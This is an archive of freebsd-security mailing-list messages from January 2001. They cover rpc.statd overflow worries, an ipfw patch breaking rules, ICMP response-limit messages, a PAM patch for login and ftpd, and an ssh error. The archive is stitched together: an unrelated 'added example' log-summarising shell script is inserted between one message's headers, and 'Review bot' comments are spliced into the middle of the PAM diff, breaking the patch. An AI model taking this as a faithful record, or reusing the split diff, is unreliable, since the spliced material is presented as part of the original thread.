In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu>

On Thu, 25 Jan 2001, Steven G. Kargl wrote:
> Are there any known compromises of rpc.statd that involve
> buffer overflows? I have several entries in /var/log/messages that
> look suspicious, but I currently don't know what these entries
> mean (see attachment). The suspicious entries appear to be
> buffers that someone or something has tried to overflow.

I just read a news item (on www.theregister.co.uk) talking about the Ramen worm that affects Redhat 6.2 and 7.0. One of the exploits it uses is to overrun something in rpc.statd. The URL to the story is http://www.theregister.co.uk/content/6/16375.html, which has a link to the RedHat security advisories.

-- 
Matt Piechota
Finger piechota@emailempire.com for PGP key
AOL IM: cithaeron

From owner-freebsd-security Thu Jan 25 14:27:50 2001
To: freebsd-security@freebsd.org
Cc: lamont@hp.com
Subject: Re: HEADS UP: Problem with advisory delivery
In-reply-to: Your message of "Thu, 25 Jan 2001 13:12:35 PST." <20010125131235.A81121@freefall.freebsd.org>
Date: Thu, 25 Jan 2001 15:27:28 -0700
From: LaMont Jones
Message-Id: <20010125222729.E86FB1872C@security.hp.com>

> There is something apparently broken with majordomo which is causing
> it to reject two of the recent advisories from being sent to the
> FreeBSD lists. Security advisories SA-01:07 and SA-01:10 are released
> (and made it to bugtraq), but have not shown up on the lists yet,
> despite re-sending.

The only bounces I've seen (from first-teams) are due to hop-counts being exceeded: (total of 16 Received: headers - they're way too low, but that could be part of your problem...)

lamont

...
Received: from security.hp.com (cranston.fc.hp.com [15.1.44.224]) by atlrel2.hp.com (Postfix) with ESMTP id A7A4115B3; Thu, 25 Jan 2001 16:13:45 -0500 (EST)
Received: by security.hp.com (Postfix) id 5C7A41872C; Thu, 25 Jan 2001 14:13:43 -0700 (MST)
Delivered-To: first-teams.out@security.hp.com
Received: by security.hp.com (Postfix, from userid 500) id 238C71872E; Thu, 25 Jan 2001 14:13:43 -0700 (MST)
Delivered-To: first-teams@first.hp.com
Received: from onet2.cup.hp.com (onet2.cup.hp.com [15.75.208.47]) by security.hp.com (Postfix) with ESMTP id 3BEA91872C for ; Thu, 25 Jan 2001 14:13:41 -0700 (MST)
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by onet2.cup.hp.com (Postfix) with ESMTP id B8B7418CA0 for ; Thu, 25 Jan 2001 13:13:40 -0800 (PST)
Received: from hub.freebsd.org (hub.FreeBSD.org [216.136.204.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id CD1376E2B32; Thu, 25 Jan 2001 13:13:05 -0800 (PST)
Received: by hub.freebsd.org (Postfix, from userid 538) id 00E8037B698; Thu, 25 Jan 2001 13:12:58 -0800 (PST)
Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with SMTP id 243402E8199; Thu, 25 Jan 2001 13:12:56 -0800 (PST)
Received: by hub.freebsd.org (bulk_mailer v1.12); Thu, 25 Jan 2001 13:12:55 -0800
Delivered-To: freebsd-security-notifications@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D9F3437B402; Thu, 25 Jan 2001 13:12:35 -0800 (PST)
Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0PLCZD81235; Thu, 25 Jan 2001 13:12:35 -0800 (PST) (envelope-from kris)

From owner-freebsd-security Thu Jan 25 17:05:06 2001
Date: Thu, 25 Jan 2001 17:08:05 -0800
From: Kris Kennaway
To: LaMont Jones
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: HEADS UP: Problem with advisory delivery
Message-ID: <20010125170805.C65768@citusc17.usc.edu>
References: <20010125131235.A81121@freefall.freebsd.org> <20010125222729.E86FB1872C@security.hp.com>
In-Reply-To: <20010125222729.E86FB1872C@security.hp.com>

On Thu, Jan 25, 2001 at 03:27:28PM -0700, LaMont Jones wrote:
> > There is something apparently broken with majordomo which is causing
> > it to reject two of the recent advisories from being sent to the
> > FreeBSD lists. Security advisories SA-01:07 and SA-01:10 are released
> > (and made it to bugtraq), but have not shown up on the lists yet,
> > despite re-sending.
>
> The only bounces I've seen (from first-teams) are due to hop-counts
> being exceeded: (total of 16 Received: headers - they're way too low,
> but that could be part of your problem...)

No, these are sent from hub.freebsd.org to hub (where majordomo lives) and being rejected there; they're not even making it into the mailing list archives, which are also archived locally.
Kris
-- 
NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org

From owner-freebsd-security Thu Jan 25 19:19:30 2001
Date: Thu, 25 Jan 2001 21:41:20 +0100
From: Gerhard Sittig
To: freebsd-security@freebsd.org
Subject: Re: Newbie Post - Limiting processes
Message-ID: <20010125214120.M253@speedy.gsinet>
Organization: System Defenestrators Inc.

On Thu, Jan 25, 2001 at 13:31 -0500, Allen Edwards wrote:
>
> Is there a way to limit a user to a certain number of
> processes? e.g. one foreground and one background process.

You mean like in "man login.conf" and search for "proc"?

virtually yours
82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net

-- 
If you don't understand or are scared by any of the above ask your parents or an adult to help you.

From owner-freebsd-security Thu Jan 25 21:56:46 2001
Date: Fri, 26 Jan 2001 08:00:04 +0200 (SAST)
From: Justin Stanford
To: questions@freebsd.org
Cc: security@freebsd.org
Subject: ipfw security patch problem..

Hi,

I upgraded my ipfw yesterday on my 4.0-STABLE system with the patch by following the instructions to the letter for the security bug discovered by Aragon Gouveia, and compile and install appeared to go seamlessly.

However, ipfw now gives me this type of problem:

[root@athena]~# ipfw add 5000 deny tcp from any to 196.30.167.200 515 via rl0
05000 deny tcp from any to 196.30.167.200 515 via rl0
ip_fw_ctl: empty interface name
ipfw: setsockopt(IP_FW_ADD): Invalid argument
[root@athena]~#

The interface is most definitely rl0, and this exact ruleset is the same I have been using for ages with my previous ipfw.

Suggestions?

-- 
Justin Stanford
082 7402741
jus@security.za.net
www.security.za.net
IT Security and Solutions

From owner-freebsd-security Thu Jan 25 22:06:29 2001
Date: Fri, 26 Jan 2001 00:05:58 -0600
From: Bill Fumerola
To: Justin Stanford
Cc: questions@freebsd.org, security@freebsd.org
Subject: Re: ipfw security patch problem..
Message-ID: <20010126000558.I57121@elvis.mu.org>
X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 i386

On Fri, Jan 26, 2001 at 08:00:04AM +0200, Justin Stanford wrote:
> Hi,
>
> I upgraded my ipfw yesterday on my 4.0-STABLE system with the patch by
> following the instructions to the letter for the security bug discovered
> by Aragon Gouveia, and compile and install appeared to go seamlessly.
>
> However, ipfw now gives me this type of problem:
>
> [root@athena]~# ipfw add 5000 deny tcp from any to 196.30.167.200 515 via rl0
> 05000 deny tcp from any to 196.30.167.200 515 via rl0
> ip_fw_ctl: empty interface name
> ipfw: setsockopt(IP_FW_ADD): Invalid argument
> [root@athena]~#

You have to compile ipfw(8), compile a new kernel (or reload a new module), and ipfw(8) needs to have /sys/netinet/ip_fw.h copied to /usr/include/netinet unless you used buildworld (this needs to happen before recompiling ipfw).

-- 
Bill Fumerola - security yahoo / Yahoo! inc.
- fumerola@yahoo-inc.com / billf@FreeBSD.org

From owner-freebsd-security Fri Jan 26 01:45:54 2001
From: "Will Mitayai Keeso Rowe"
Subject: ICMP attacks
Date: Fri, 26 Jan 2001 04:44:51 -0500

> icmp-response bandwidth limit 205/200 pps
> icmp-response bandwidth limit 264/200 pps
> icmp-response bandwidth limit 269/200 pps
> icmp-response bandwidth limit 273/200 pps
> icmp-response bandwidth limit 273/200 pps
> icmp-response bandwidth limit 271/200 pps
> icmp-response bandwidth limit 261/200 pps
> icmp-response bandwidth limit 268/200 pps
> icmp-response bandwidth limit 205/200 pps
> icmp-response bandwidth limit 223/200 pps

Is there any way to trace the people that are causing this? It's becoming a daily occurrence and it's beginning to irritate me.

-Mit

From owner-freebsd-security Fri Jan 26 01:53:00 2001
Date: Fri, 26 Jan 2001 01:56:05 -0800
From: Kris Kennaway
To: Will Mitayai Keeso Rowe
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ICMP attacks
Message-ID: <20010126015605.A74360@citusc17.usc.edu>

On Fri, Jan 26, 2001 at 04:44:51AM -0500, Will Mitayai Keeso Rowe wrote:
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 264/200 pps
> > icmp-response bandwidth limit 269/200 pps
> > icmp-response bandwidth limit 273/200 pps
> > icmp-response bandwidth limit 273/200 pps
> > icmp-response bandwidth limit 271/200 pps
> > icmp-response bandwidth limit 261/200 pps
> > icmp-response bandwidth limit 268/200 pps
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 223/200 pps
>
> Is there any way to trace the people that are causing this? It's becoming a
> daily occurrence and it's beginning to irritate me.

It's not necessarily an attack - could be a simple local misconfiguration. Check the archives for more.
Kris
-- 
NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org

From owner-freebsd-security Fri Jan 26 01:55:46 2001
Message-ID: <3A715799.8EECF43@incorp.dk>
Date: Fri, 26 Jan 2001 10:55:21 +0000
From: Dennis Rand
To: freebsd-security@freebsd.org
Subject: Re: ICMP attacks

I also have this problem, but that is when I portscan my computer from another
host, so is there a place or a log where I can check what IP has caused this?

Will Mitayai Keeso Rowe wrote:
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 264/200 pps
> > icmp-response bandwidth limit 269/200 pps
> > icmp-response bandwidth limit 273/200 pps
> > icmp-response bandwidth limit 273/200 pps
> > icmp-response bandwidth limit 271/200 pps
> > icmp-response bandwidth limit 261/200 pps
> > icmp-response bandwidth limit 268/200 pps
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 223/200 pps
>
> Is there any way to trace the people that are causing this? It's becoming a
> daily occurrence and it's beginning to irritate me.
>
> -Mit

--
Med Venlig Hilsen / Best regards
__________________________
Dennis Rand
inCorp A/S - Odense
Middelfartvej 9-11
5000 Odense C
Tlf.: 70 22 55 30
Fax.: 63 12 55 39
Email: dr@incorp.dk
http://www.inCorp.dk

From owner-freebsd-security Fri Jan 26 1:58:10 2001
Date: Fri, 26 Jan 2001 02:01:15 -0800
From: Kris Kennaway
To: Dennis Rand
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ICMP attacks
Message-ID: <20010126020115.A74520@citusc17.usc.edu>
In-Reply-To: <3A715799.8EECF43@incorp.dk>

On Fri, Jan 26, 2001 at 10:55:21AM +0000, Dennis Rand wrote:
> I also have this problem but that is when I portscan my computer from another
> host so is there a place or a log where I can check what IP has caused this

Use something like tcpdump, or ipfw.

Kris

--
NOTE: To fetch an updated copy of my GPG key which has not expired,
finger kris@FreeBSD.org

From owner-freebsd-security Fri Jan 26 2:01:14 2001
Date: Fri, 26 Jan 2001 11:58:59 +0200
From: Peter Pentchev
To: Dennis Rand
Cc: freebsd-security@freebsd.org
Subject: Re: ICMP attacks
Message-ID: <20010126115858.B5418@ringworld.oblivion.bg>
In-Reply-To: <3A715799.8EECF43@incorp.dk>

On Fri, Jan 26, 2001 at 10:55:21AM +0000, Dennis Rand wrote:
> I also have this problem but that is when I portscan my computer from another
> host so is there a place or a log where I can check what IP has caused this

You can make your firewall log all denied packets - it's those that cause
ICMP responses, mostly. I'm not sure logging all denied packets is a good
idea, though, especially if you expect - or even deem it possible - that you
might be attacked. Trust me, I've had syslogd hog my CPU during a portscan :)

G'luck,
Peter

--
When you are not looking at it, this sentence is in Spanish.

From owner-freebsd-security Fri Jan 26 2:01:34 2001
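Kris's and Peter's replies above point at ipfw logging and tcpdump for finding where the packets come from. What follows is an added example of what to do with the resulting log; it is not code from the thread or from FreeBSD. It is a POSIX sh/awk script that summarises ipfw "Deny" lines from syslog by source address and reports the busiest second, so the count can be set against the 200 pps icmp-response limit in the messages quoted above. The log line layout assumed here (`ipfw: <rule> Deny <proto> <src>[:port] <dst>[:port] <in|out> via <iface>`, written by syslog with the `/kernel:` prefix), the log file path and the sample lines are assumptions constructed for the example; check them against your own logs.

```shell
#!/bin/sh
# Summarise ipfw "Deny" log lines by source address and find the busiest second.
# Assumed line layout (constructed sample; verify against your own logs):
#   Jan 26 11:58:59 host /kernel: ipfw: 65000 Deny TCP 10.1.2.3:1025 192.0.2.10:23 in via rl0
# Fields: $3 = time, $6 = "ipfw:", $7 = rule number, $8 = action, $9 = protocol,
#         $10 = source[:port], $11 = destination[:port].

# Constructed sample log, not from the thread.
SAMPLE_LOG='Jan 26 11:58:59 ringworld /kernel: ipfw: 65000 Deny TCP 10.1.2.3:1025 192.0.2.10:23 in via rl0
Jan 26 11:58:59 ringworld /kernel: ipfw: 65000 Deny TCP 10.1.2.3:1026 192.0.2.10:25 in via rl0
Jan 26 11:58:59 ringworld /kernel: ipfw: 65000 Deny UDP 198.51.100.7:53 192.0.2.10:111 in via rl0
Jan 26 11:59:00 ringworld /kernel: ipfw: 65000 Deny TCP 10.1.2.3:1027 192.0.2.10:80 in via rl0
Jan 26 11:59:00 ringworld /kernel: ipfw: 65000 Deny ICMP:8.0 203.0.113.9 192.0.2.10 in via rl0
Jan 26 11:59:00 ringworld /kernel: ipfw: 100 Accept TCP 198.51.100.7:40000 192.0.2.10:22 in via rl0
Jan 26 11:59:01 ringworld /kernel: ipfw: 65000 Deny UDP 198.51.100.7:53 192.0.2.10:2049 in via rl0
Jan 26 11:59:01 ringworld sshd[123]: Connection closed by 10.1.2.3'

# Read log lines on stdin; print "count source", most active source first.
ipfw_deny_sources() {
    awk '$6 == "ipfw:" && $8 == "Deny" {
             src = $10
             sub(/:[0-9]+$/, "", src)   # drop the port, keep the address
             n[src]++
         }
         END { for (s in n) print n[s], s }' | sort -rn
}

# Read log lines on stdin; print "count HH:MM:SS" for the second with the
# most denied packets (compare with the 200 pps icmp-response limit).
ipfw_deny_peak_pps() {
    awk '$6 == "ipfw:" && $8 == "Deny" { c[$3]++ }
         END {
             max = 0; when = ""
             for (t in c) if (c[t] > max) { max = c[t]; when = t }
             print max, when
         }'
}

# Demo on the constructed sample. On a real box, feed the log ipfw writes to
# (assumed here to be /var/log/security) instead:
#   grep "ipfw: " /var/log/security | ipfw_deny_sources | head
printf '%s\n' "$SAMPLE_LOG" | ipfw_deny_sources
printf '%s\n' "$SAMPLE_LOG" | ipfw_deny_peak_pps
```

Only lines whose action is "Deny" are counted, so accepted traffic and unrelated syslog lines are ignored, and the ICMP form (no port after the address) is handled by the same port-stripping rule. Peter's caveat still applies: the script only sees what the firewall logged, and logging every denied packet is itself a load on syslogd.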
From: "Will Mitayai Keeso Rowe"
To: "Kris Kennaway"
Subject: RE: ICMP attacks
Date: Fri, 26 Jan 2001 05:00:37 -0500
In-Reply-To: <20010126015605.A74360@citusc17.usc.edu>

even if it happens at no predictable intervals, and sometimes not for days?

:-----Original Message-----
:From: Kris Kennaway [mailto:kris@FreeBSD.ORG]
:Sent: January 26, 2001 04:56 AM
:To: Will Mitayai Keeso Rowe
:Cc: freebsd-security@FreeBSD.ORG
:Subject: Re: ICMP attacks
:
:
:On Fri, Jan 26, 2001 at 04:44:51AM -0500, Will Mitayai Keeso Rowe wrote:
:> > icmp-response bandwidth limit 205/200 pps
:> > icmp-response bandwidth limit 264/200 pps
:> > icmp-response bandwidth limit 269/200 pps
:> > icmp-response bandwidth limit 273/200 pps
:> > icmp-response bandwidth limit 273/200 pps
:> > icmp-response bandwidth limit 271/200 pps
:> > icmp-response bandwidth limit 261/200 pps
:> > icmp-response bandwidth limit 268/200 pps
:> > icmp-response bandwidth limit 205/200 pps
:> > icmp-response bandwidth limit 223/200 pps
:>
:> Is there any way to trace the people that are causing this? It's
:becoming a
:> daily occurrence and it's beginning to irritate me.
:
:It's not necessarily an attack - could be a simple local
:misconfiguration. Check the archives for more.
:
:Kris
:
:--
:NOTE: To fetch an updated copy of my GPG key which has not expired,
:finger kris@FreeBSD.org
:

From owner-freebsd-security Fri Jan 26 2:06:10 2001
Date: Fri, 26 Jan 2001 02:09:10 -0800
From: Kris Kennaway
To: Will Mitayai Keeso Rowe
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ICMP attacks
Message-ID: <20010126020910.A74755@citusc17.usc.edu>
References: <20010126015605.A74360@citusc17.usc.edu>

On Fri, Jan 26, 2001 at 05:00:37AM -0500, Will Mitayai Keeso Rowe wrote:
> even if it happens at no predictable intervals, and sometimes not for days?

Yes.

Kris

--
NOTE: To fetch an updated copy of my GPG key which has not expired,
finger kris@FreeBSD.org

From owner-freebsd-security Fri Jan 26 2:12:49 2001
Date: Fri, 26 Jan 2001 04:12:21 -0600
From: Bill Fumerola
To: Will Mitayai Keeso Rowe
Cc: freebsd-security@freebsd.org
Subject: Re: ICMP attacks
Message-ID: <20010126041221.J57121@elvis.mu.org>
X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 i386

On Fri, Jan 26, 2001 at 04:44:51AM -0500, Will Mitayai Keeso Rowe wrote:
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 264/200 pps
> > icmp-response bandwidth limit 269/200 pps
> > icmp-response bandwidth limit 273/200 pps
> > icmp-response bandwidth limit 273/200 pps
> > icmp-response bandwidth limit 271/200 pps
> > icmp-response bandwidth limit 261/200 pps
> > icmp-response bandwidth limit 268/200 pps
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 223/200 pps
>
> Is there any way to trace the people that are causing this? It's becoming a
> daily occurrence and it's beginning to irritate me.

tcpdump(1)

--
Bill Fumerola - security yahoo / Yahoo! inc.
- fumerola@yahoo-inc.com / billf@FreeBSD.org

From owner-freebsd-security Fri Jan 26 3:35:25 2001
Message-ID: <003601c0878c$2ec00040$3cfdf2c8@nirvana>
From: "Roberto Samarone Araujo (RSA)"
Subject: Re: ICMP attacks
Date: Fri, 26 Jan 2001 08:36:10 -0300

> > icmp-response bandwidth limit 261/200 pps
> > icmp-response bandwidth limit 268/200 pps
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 223/200 pps

Hi,

Sometimes, when someone is trying to do a port scan, this message appears, so
if you want to know who is trying to port scan your FreeBSD box you can use
PortSentry; it will log the port scans. You can compile it from the ports
collection.

Roberto Samarone Araujo

From owner-freebsd-security Fri Jan 26 5:40:50 2001
From: "David J. MacKenzie" MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14961.32333.212703.615370@jenkins.web.us.uu.net> Date: Fri, 26 Jan 2001 08:40:29 -0500 (EST) To: freebsd-security@freebsd.org Subject: full PAM support patch for ftpd and fix for login X-Mailer: VM 6.62 under Emacs 19.34.1 X-Quote: It's a good thing we have gravity or else when birds died they'd just stay right up there. Hunters would be all confused. -- Stephen Wright Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My full PAM support patch for login mishandles some return values, for which my fix is: --- login.c 2001/01/23 23:15:29 1.10 +++ login.c 2001/01/26 13:36:49 @@ -790,20 +790,20 @@ break; } - if (rval != -1) { + if (rval == 0) { e = pam_acct_mgmt(pamh, 0); if (e == PAM_NEW_AUTHTOK_REQD) { e = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); if (e != PAM_SUCCESS) { syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, e)); - rval = -1; + rval = 1; } } else if (e != PAM_SUCCESS) { rval = 1; } } - if (rval == -1) { + if (rval != 0) { if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); } which I discovered while adapting that patch to ftpd: --- ./Makefile 2001/01/26 13:12:30 1.1 +++ ./Makefile 2001/01/26 13:12:43 @@ -18,9 +18,8 @@ SRCS+= ls.c cmp.c print.c util.c CFLAGS+=-Dmain=ls_main -I${.CURDIR}/${LSDIR} -.if defined(NOPAM) -CFLAGS+=-DNOPAM -.else +.if !defined(NOPAM) +CFLAGS+=-DUSE_PAM DPADD+= ${LIBPAM} LDADD+= ${MINUSLPAM} .endif --- ./ftpd.c 2001/01/25 22:09:55 1.1 +++ ./ftpd.c 2001/01/26 13:37:17 @@ -94,7 +94,7 @@ #include #endif -#if !defined(NOPAM) +#ifdef USE_PAM #include #endif @@ -179,8 +179,9 @@ static char ttyline[20]; char *tty = ttyline; /* for klogin */ -#if !defined(NOPAM) +#ifdef USE_PAM static int auth_pam __P((struct passwd**, const char*)); +pam_handle_t *pamh = NULL; #endif char *pid_file = NULL; 
@@ -1015,6 +1016,9 @@ static void end_login() { +#ifdef USE_PAM + int e; +#endif (void) seteuid((uid_t)0); if (logged_in) @@ -1024,12 +1028,21 @@ setusercontext(NULL, getpwuid(0), (uid_t)0, LOGIN_SETPRIORITY|LOGIN_SETRESOURCES|LOGIN_SETUMASK); #endif +#ifdef USE_PAM + if ((e = pam_setcred(pamh, PAM_DELETE_CRED)) != PAM_SUCCESS) + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, e)); + if ((e = pam_close_session(pamh,0)) != PAM_SUCCESS) + syslog(LOG_ERR, "pam_close_session: %s", pam_strerror(pamh, e)); + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); + pamh = NULL; +#endif logged_in = 0; guest = 0; dochroot = 0; } -#if !defined(NOPAM) +#ifdef USE_PAM /* * the following code is stolen from imap-uw PAM authentication module and @@ -1148,19 +1161,34 @@ break; default: - syslog(LOG_ERR, "auth_pam: %s", pam_strerror(pamh, e)); + syslog(LOG_ERR, "pam_authenticate: %s", pam_strerror(pamh, e)); rval = -1; break; } - if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { - syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); - rval = -1; + if (rval == 0) { + e = pam_acct_mgmt(pamh, 0); + if (e == PAM_NEW_AUTHTOK_REQD) { + e = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); + if (e != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, e)); + rval = 1; + } + } else if (e != PAM_SUCCESS) { + rval = 1; + } + } + + if (rval != 0) { + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); + } + pamh = NULL; } return rval; } -#endif /* !defined(NOPAM) */ +#endif /* USE_PAM */ void pass(passwd) @@ -1171,6 +1199,9 @@ #ifdef LOGIN_CAP login_cap_t *lc = NULL; #endif +#ifdef USE_PAM + int e; +#endif if (logged_in || askpasswd == 0) { reply(503, "Login with USER first."); @@ -1182,7 +1213,7 @@ rval = 1; /* failure below */ goto skip; } -#if !defined(NOPAM) +#ifdef USE_PAM rval = auth_pam(&pw, passwd); if (rval >= 0) goto skip; 
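Review bot: the login.c hunk changes what rval means without saying so in the code; after it, the callers depend on three values (-1 for "PAM not usable, fall back", 0 for success, 1 for authentication failure), and the only hint is the `if (rval >= 0) goto skip;` context in the later pass() hunk. A one-line comment where `rval = 1;` replaces `rval = -1;` (failed account management or password change is a real failure, not a reason to fall back to the non-PAM path) would document the convention, and it also explains why pam_end is now reached for every non-zero rval rather than only for -1.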
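Review bot: in the end_login() hunk the new pam_setcred, pam_close_session and pam_end calls run unconditionally whenever USE_PAM is defined, although pamh is NULL after a login that did not go through PAM (auth_pam sets `pamh = NULL;` on every non-zero return, and the later pass() hunk guards its own session calls with `if (pamh)`). With a NULL handle each call fails and the failure is syslogged on every such logout; wrap the block in the same guard, `if (pamh) { ... pamh = NULL; }`, so the cleanup only runs for sessions that were actually opened.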
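Review bot: `pam_handle_t *pamh = NULL;` in the ftpd.c declarations hunk is file-scope but not static, unlike the neighbouring `static int auth_pam __P(...)`; nothing outside ftpd.c needs it, so `static pam_handle_t *pamh = NULL;` keeps it out of the global namespace, where a symbol called pamh is easy to collide with.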
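Review bot: the Makefile hunk renames the compile-time switch from -DNOPAM to -DUSE_PAM, so any source that still tests `NOPAM` now silently compiles without PAM instead of failing; the ftpd.c hunks convert the `#if !defined(NOPAM)` sites shown, but the rest of the ftpd sources should be grepped for remaining NOPAM references before this is committed.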
@@ -1261,6 +1292,16 @@ #else setlogin(pw->pw_name); (void) initgroups(pw->pw_name, pw->pw_gid); +#endif + +#ifdef USE_PAM + if (pamh) { + if ((e = pam_open_session(pamh, 0)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_open_session: %s", pam_strerror(pamh, e)); + } else if ((e = pam_setcred(pamh, PAM_ESTABLISH_CRED)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, e)); + } + } #endif /* open wtmp before chroot */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 6:41:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from pozitif.net (unknown [213.194.71.201]) by hub.freebsd.org (Postfix) with SMTP id 7611537B400; Fri, 26 Jan 2001 06:41:25 -0800 (PST) Received: from pozitif.net ([62.29.69.50]) by pozitif.net ; Fri, 26 Jan 2001 16:49:24 +0200 Message-ID: <3A718C97.E45FA754@pozitif.net> Date: Fri, 26 Jan 2001 16:41:28 +0200 
From: Mehmet Hinc
To: Justin Stanford
Cc: questions@freebsd.org, security@freebsd.org
Subject: Re: ipfw security patch problem..
X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-RELEASE i386)

Justin Stanford wrote:
> Hi,
>
> I upgraded my ipfw yesterday on my 4.0-STABLE system with the patch by
> following the instructions to the letter for the security bug discovered
> by Aragon Gouveia, and compile and install appeared to go seamlessly.
>
> However, ipfw now gives me this type of problem:
>
> [root@athena]~# ipfw add 5000 deny tcp from any to 196.30.167.200 515 via rl0
> 05000 deny tcp from any to 196.30.167.200 515 via rl0
> ip_fw_ctl: empty interface name
> ipfw: setsockopt(IP_FW_ADD): Invalid argument
> [root@athena]~#
>
> The interface is most definitely rl0, and this exact ruleset is the same I
> have been using for ages with my previous ipfw. Suggestions?
>
> --
> Justin Stanford
> 082 7402741
> jus@security.za.net
> www.security.za.net
> IT Security and Solutions

Yup, I've heard of this problem and I tried to solve it. I copied
/sys/netinet/ip_fw.h to /usr/include/netine and then I recompiled my kernel.
After that, this problem disappeared from my box.
Mehmet Hinc
Yildiz Teknik University
From Turkey

From owner-freebsd-security Fri Jan 26 7:00:15 2001
To: Will Mitayai Keeso Rowe
Subject: Re: ICMP attacks
Message-ID: <980521178.3a7190da7ba07@mail.marketnews.com>
Date: Fri, 26 Jan 2001 09:59:38 -0500
Try using an intrusion detection system. Snort works well for me. If this is
just a port scan it will show a lot of different attack warnings as the
different ports are hit, but it will show what IP is doing it.

Mason

Quoting Will Mitayai Keeso Rowe:
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 264/200 pps
> > icmp-response bandwidth limit 269/200 pps
> > icmp-response bandwidth limit 273/200 pps
> > icmp-response bandwidth limit 273/200 pps
> > icmp-response bandwidth limit 271/200 pps
> > icmp-response bandwidth limit 261/200 pps
> > icmp-response bandwidth limit 268/200 pps
> > icmp-response bandwidth limit 205/200 pps
> > icmp-response bandwidth limit 223/200 pps
>
> Is there any way to trace the people that are causing this? It's
> becoming a
> daily occurrence and it's beginning to irritate me.
>
> -Mit
>

From owner-freebsd-security Fri Jan 26 8:36:54 2001
Message-Id: <5.0.0.25.1.20010126173443.02d9e1e8@pop3.itp.asdis.de>
Date: Fri, 26 Jan 2001 17:36:33 +0100
To: freebsd-security@freebsd.org
From: Martin Ibert
Subject: Another problem with the ipfw patch - even bigger hole in the firewall on 4.0R (was: Re: ipfw security patch problem..)

[Sorry Justin! I forgot to Cc: the list when I replied to your mail, so you
now have it twice. :-( ]

At 08:00 26.01.2001 +0200, you wrote:
>I upgraded my ipfw yesterday on my 4.0-STABLE system with the patch by
>following the instructions to the letter for the security bug discovered
>by Aragon Gouveia, and compile and install appeared to go seamlessly.

We also tried to patch a 4.0-RELEASE system. We worked according to the
step-by-step instructions provided in the advisory. Some patches were
rejected and had to be done by hand, but apart from that, no major problems
were discovered during build and install.

However, the resulting combination of kernel and ipfw tool did not work! It
appears that the firewall took EVERY tcp packet to be part of an
"established" connection and happily passed setup packets in and out.

We quickly retraced our steps and reverted the system to its pre-patched
state.

Did anyone experience the same problems as we did? And does anyone have a
solution (short of upgrading to 4.2-RELEASE or better?)

--
---------------------------------------------------------------
Dipl.-Inform.
Martin Ibert - phone: +49-30-20631-607, fax: -199 -
ASDIS Software AG, Neue Grünstraße 25, D-10179 Berlin-Mitte -
---------------- http://www.asdis.de/ -- mailto:mib@asdis.de --

From owner-freebsd-security Fri Jan 26 9:44:56 2001
From: Bruce Albrecht
Message-ID: <14961.46979.314273.536660@localhost.zuhause.org>
Date: Fri, 26 Jan 2001 11:44:35 -0600 (CST)
To: freebsd-security@freebsd.org
Subject: weird ssh failure

I was trying to log onto my FreeBSD box today from work via ssh after
an ssh session apparently terminated, and for about 5 minutes I was
getting an error something like "User does not exist! Go away!".
Since this is not normal behaviour for ssh, does anyone have any idea
what might have happened? Could someone be doing a man-in-the-middle
attack on me?

From owner-freebsd-security Fri Jan 26 9:52:03 2001
Date: Fri, 26 Jan 2001 09:51:47 -0800
From: "Crist J. Clark"
To: David La Croix
Cc: "Scot W. Hetzel", freebsd-security@FreeBSD.ORG
Subject: Re: buffer overflows in rpc.statd?
Message-ID: <20010126095147.A66394@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: <026c01c086f6$c2c151e0$7d7885c0@genroco.com> <200101251804.NAA00434@cowpie.acm.vt.edu>
In-Reply-To: <200101251804.NAA00434@cowpie.acm.vt.edu>

On Thu, Jan 25, 2001 at 12:04:32PM -0600, David La Croix wrote:
